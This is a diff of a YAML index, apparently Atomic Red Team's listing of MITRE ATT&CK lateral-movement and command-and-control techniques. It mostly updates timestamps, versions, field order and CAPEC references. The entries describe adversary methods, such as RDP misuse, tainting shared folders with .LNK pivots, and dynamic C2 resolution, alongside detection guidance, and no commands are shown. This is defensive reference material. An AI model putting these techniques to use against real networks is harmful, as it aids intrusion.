identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -46518,9 +54534,9 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-23T20:24:52.899Z' + modified: '2020-09-16T19:40:02.024Z' created: '2020-01-30T17:37:22.261Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -46860,13 +54876,13 @@ lateral-movement: source_name: Trend Micro When Phishing Starts from the Inside 2017 - description: THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019. - url: " https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6 " + url: https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6 source_name: THE FINANCIAL TIMES LTD 2019. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-31T22:13:33.718Z' + modified: '2020-09-17T18:26:41.796Z' created: '2019-09-04T19:26:12.441Z' x_mitre_is_subtechnique: false x_mitre_data_sources: @@ -47252,6 +55268,30 @@ lateral-movement: elevation_required: true T1021.001: technique: + created: '2020-02-11T18:23:26.059Z' + modified: '2020-02-25T19:23:34.204Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + type: attack-pattern + id: attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf + description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) + to log into a computer using the Remote Desktop Protocol (RDP). The adversary + may then perform actions as the logged-on user.\n\nRemote desktop is a common + feature in operating systems. It allows a user to log into an interactive + session with a system desktop graphical user interface on a remote system. + Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) + as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) + \n\nAdversaries may connect to a remote system over RDP/RDS to expand access + if the service is enabled and allows access to accounts with known credentials. + Adversaries will likely use Credential Access techniques to acquire credentials + to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility + Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: + Alperovitch Malware)" + name: Remote Desktop Protocol + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1021.001 @@ -47267,51 +55307,27 @@ lateral-movement: description: Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014. source_name: Alperovitch Malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Remote Desktop Protocol - description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) - to log into a computer using the Remote Desktop Protocol (RDP). The adversary - may then perform actions as the logged-on user.\n\nRemote desktop is a common - feature in operating systems. It allows a user to log into an interactive - session with a system desktop graphical user interface on a remote system. - Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) - as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) - \n\nAdversaries may connect to a remote system over RDP/RDS to expand access - if the service is enabled and allows access to accounts with known credentials. - Adversaries will likely use Credential Access techniques to acquire credentials - to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility - Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: - Alperovitch Malware)" - id: attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - modified: '2020-02-25T19:23:34.204Z' - created: '2020-02-11T18:23:26.059Z' - x_mitre_contributors: - - Matthew Demaske, Adaptforward - x_mitre_system_requirements: - - RDP service enabled, account in the Remote Desktop Users group - x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs - x_mitre_permissions_required: - - Remote Desktop Users - - User + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Remote Desktop Users + - User + x_mitre_data_sources: + - Process monitoring + - Netflow/Enclave netflow + - Authentication logs + x_mitre_system_requirements: + - RDP service enabled, account in the Remote Desktop Users group + x_mitre_contributors: + - Matthew Demaske, Adaptforward identifier: T1021.001 atomic_tests: - name: RDP to DomainController @@ -47895,8 +55911,11 @@ lateral-movement: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1072 external_id: T1072 + url: https://attack.mitre.org/techniques/T1072 + - external_id: CAPEC-187 + source_name: capec + url: https://capec.mitre.org/data/definitions/187.html description: |- Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). @@ -47912,10 +55931,10 @@ lateral-movement: phase_name: execution - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-02-21T16:31:32.789Z' + modified: '2020-09-16T15:27:01.403Z' created: '2017-05-31T21:30:57.201Z' x_mitre_is_subtechnique: false - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_data_sources: - Authentication logs - File monitoring @@ -47956,16 +55975,14 @@ lateral-movement: atomic_tests: [] T1080: technique: - id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Taint Shared Content - description: |2- - - Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. - - A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot) - - Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS. + created: '2017-05-31T21:31:01.759Z' + modified: '2020-03-31T22:14:56.107Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1080 @@ -47977,32 +55994,34 @@ lateral-movement: description: Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018. source_name: Retwin Directory Share Pivot - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - modified: '2020-03-31T22:14:56.107Z' - created: '2017-05-31T21:31:01.759Z' - x_mitre_is_subtechnique: false - x_mitre_system_requirements: - - Access to shared folders and content with write permissions - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User + description: |2- + + Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. + + A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot) + + Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS. + name: Taint Shared Content + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c + x_mitre_version: '1.2' + x_mitre_data_sources: + - File monitoring + - Process monitoring + x_mitre_contributors: + - Michal Dida, ESET + - David Routin x_mitre_detection: |- Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques. Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content. - x_mitre_contributors: - - Michal Dida, ESET - - David Routin - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '1.2' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + x_mitre_system_requirements: + - Access to shared folders and content with write permissions + x_mitre_is_subtechnique: false atomic_tests: [] T1550: technique: @@ -48050,7 +56069,7 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-24T12:36:24.608Z' + modified: '2020-09-16T19:40:44.714Z' created: '2020-01-30T16:18:36.873Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -48123,6 +56142,9 @@ lateral-movement: - source_name: mitre-attack external_id: T1550.004 url: https://attack.mitre.org/techniques/T1550/004 + - external_id: CAPEC-60 + source_name: capec + url: https://capec.mitre.org/data/definitions/60.html - description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019. url: https://wunderwuzzi23.github.io/blog/passthecookie.html @@ -48148,9 +56170,9 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-24T12:36:24.501Z' + modified: '2020-09-16T19:40:44.527Z' created: '2020-01-30T17:48:49.395Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -48292,23 +56314,8 @@ lateral-movement: command-and-control: T1071: technique: - created: '2017-05-31T21:30:56.776Z' - modified: '2020-03-27T19:02:44.772Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Application Layer Protocol - description: "Adversaries may communicate using application layer protocols - to avoid detection/network filtering by blending in with existing traffic. - Commands to the remote system, and often the results of those commands, will - be embedded within the protocol traffic between the client and server. \n\nAdversaries - may utilize many different protocols, including those used for web browsing, - transferring files, electronic mail, or DNS. For connections that occur internally - within an enclave (such as those between a proxy or pivot node and other nodes), - commonly used protocols are SMB, SSH, or RDP. " + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1071 @@ -48317,21 +56324,24 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_network_requirements: true - x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client - sending significantly more data than it receives from a server). Processes - utilizing the network that do not normally have network communication or have - never been seen before are suspicious. Analyze packet contents to detect application - layer protocols that do not follow the expected protocol standards regarding - syntax, structure, or any other variable adversaries could leverage to conceal - data.(Citation: University of Birmingham C2)' + description: "Adversaries may communicate using application layer protocols + to avoid detection/network filtering by blending in with existing traffic. + Commands to the remote system, and often the results of those commands, will + be embedded within the protocol traffic between the client and server. \n\nAdversaries + may utilize many different protocols, including those used for web browsing, + transferring files, electronic mail, or DNS. For connections that occur internally + within an enclave (such as those between a proxy or pivot node and other nodes), + commonly used protocols are SMB, SSH, or RDP. " + name: Application Layer Protocol + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-10-21T16:35:45.986Z' + created: '2017-05-31T21:30:56.776Z' + x_mitre_version: '2.0' x_mitre_data_sources: - DNS records - Network protocol analysis @@ -48339,10 +56349,37 @@ command-and-control: - Netflow/Enclave netflow - Process use of network - Process monitoring - x_mitre_version: '2.0' + x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client + sending significantly more data than it receives from a server). Processes + utilizing the network that do not normally have network communication or have + never been seen before are suspicious. Analyze packet contents to detect application + layer protocols that do not follow the expected protocol standards regarding + syntax, structure, or any other variable adversaries could leverage to conceal + data.(Citation: University of Birmingham C2)' + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false atomic_tests: [] T1573.002: technique: + created: '2020-03-16T15:48:33.882Z' + modified: '2020-03-30T00:37:16.593Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada + description: |- + Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. + + For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). + name: Asymmetric Cryptography + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1573.002 @@ -48359,37 +56396,22 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Asymmetric Cryptography - description: |- - Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. - - For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). - id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-30T00:37:16.593Z' - created: '2020-03-16T15:48:33.882Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks) - - In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) + x_mitre_platforms: + - Linux + - macOS + - Windows x_mitre_data_sources: - Process monitoring - Process use of network - Malware reverse engineering - Netflow/Enclave netflow - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_detection: |- + SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks) + + In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1102.002: technique: @@ -48452,9 +56474,23 @@ command-and-control: atomic_tests: [] T1043: technique: - id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Commonly Used Port + created: '2017-05-31T21:30:42.657Z' + modified: '2020-07-06T17:54:28.071Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + revoked: false + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1043 + url: https://attack.mitre.org/techniques/T1043 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 description: "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection @@ -48465,42 +56501,28 @@ command-and-control: occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)" - external_references: - - source_name: mitre-attack - external_id: T1043 - url: https://attack.mitre.org/techniques/T1043 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-07-06T17:54:28.071Z' - created: '2017-05-31T21:30:42.657Z' - x_mitre_deprecated: true - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_network_requirements: true + name: Commonly Used Port + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e + x_mitre_version: '1.0' + x_mitre_data_sources: + - Packet capture + - Netflow/Enclave netflow + - Process use of network + - Process monitoring x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring - x_mitre_version: '1.0' + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false + x_mitre_deprecated: true atomic_tests: [] T1092: technique: @@ -48579,7 +56601,7 @@ command-and-control: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-03-27T19:02:44.600Z' + modified: '2020-10-21T16:26:34.196Z' created: '2020-03-15T16:27:31.768Z' x_mitre_contributors: - Jan Petrov, Citi @@ -48590,11 +56612,10 @@ command-and-control: Monitor for DNS traffic to/from known-bad or suspicious domains. x_mitre_data_sources: - - DNS records - Netflow/Enclave netflow + - DNS records - Process monitoring - Process use of network - - Netflow/Enclave netflow - Packet capture x_mitre_platforms: - Linux @@ -48932,6 +56953,9 @@ command-and-control: - source_name: mitre-attack external_id: T1090.004 url: https://attack.mitre.org/techniques/T1090/004 + - external_id: CAPEC-481 + source_name: capec + url: https://capec.mitre.org/data/definitions/481.html - url: http://www.icir.org/vern/papers/meek-PETS-2015.pdf description: David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. @@ -48951,9 +56975,9 @@ command-and-control: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-06-20T20:53:20.398Z' + modified: '2020-09-16T19:30:54.226Z' created: '2020-03-14T23:29:19.581Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI @@ -49032,7 +57056,7 @@ command-and-control: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-03-12T14:45:22.784Z' + modified: '2020-10-02T01:37:39.618Z' created: '2020-03-10T17:44:59.787Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -49041,7 +57065,7 @@ command-and-control: x_mitre_detection: |- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains. - Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA) + Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA) x_mitre_data_sources: - DNS records - Netflow/Enclave netflow @@ -49059,21 +57083,6 @@ command-and-control: atomic_tests: [] T1568: technique: - created: '2020-03-10T17:28:11.747Z' - modified: '2020-03-27T20:54:28.560Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b - description: |- - Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. - - Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) - name: Dynamic Resolution - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1568 @@ -49094,18 +57103,23 @@ command-and-control: url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/ description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - SSL/TLS inspection - - Web logs - - DNS records + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Dynamic Resolution + description: |- + Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. + + Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) + id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-10-02T01:37:39.938Z' + created: '2020-03-10T17:28:11.747Z' + x_mitre_contributors: + - Chris Roffe x_mitre_detection: 'Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches @@ -49116,8 +57130,18 @@ command-and-control: names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.' - x_mitre_contributors: - - Chris Roffe + x_mitre_data_sources: + - SSL/TLS inspection + - Web logs + - DNS records + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1573: technique: @@ -49370,7 +57394,7 @@ command-and-control: associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic - between the client and server. \n\nProtocols such as FTP, FTPS, and TFPT that + between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may @@ -49381,7 +57405,7 @@ command-and-control: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-03-26T20:26:46.465Z' + modified: '2020-08-21T14:41:22.911Z' created: '2020-03-15T16:16:25.763Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -49404,8 +57428,21 @@ command-and-control: atomic_tests: [] T1105: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:16.408Z' + modified: '2020-03-20T15:42:48.595Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Ingress Tool Transfer + description: Adversaries may transfer tools or other files from an external + system into a compromised environment. Files may be copied from an external + adversary controlled system through the command and control channel to bring + tools into the victim network or through alternate protocols with another + tool such as FTP. Files can also be copied over on Mac and Linux with native + tools like scp, rsync, and sftp. external_references: - source_name: mitre-attack external_id: T1105 @@ -49414,22 +57451,19 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: Adversaries may transfer tools or other files from an external - system into a compromised environment. Files may be copied from an external - adversary controlled system through the command and control channel to bring - tools into the victim network or through alternate protocols with another - tool such as FTP. Files can also be copied over on Mac and Linux with native - tools like scp, rsync, and sftp. - name: Ingress Tool Transfer - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-20T15:42:48.595Z' - created: '2017-05-31T21:31:16.408Z' - x_mitre_version: '2.0' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious. + + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) 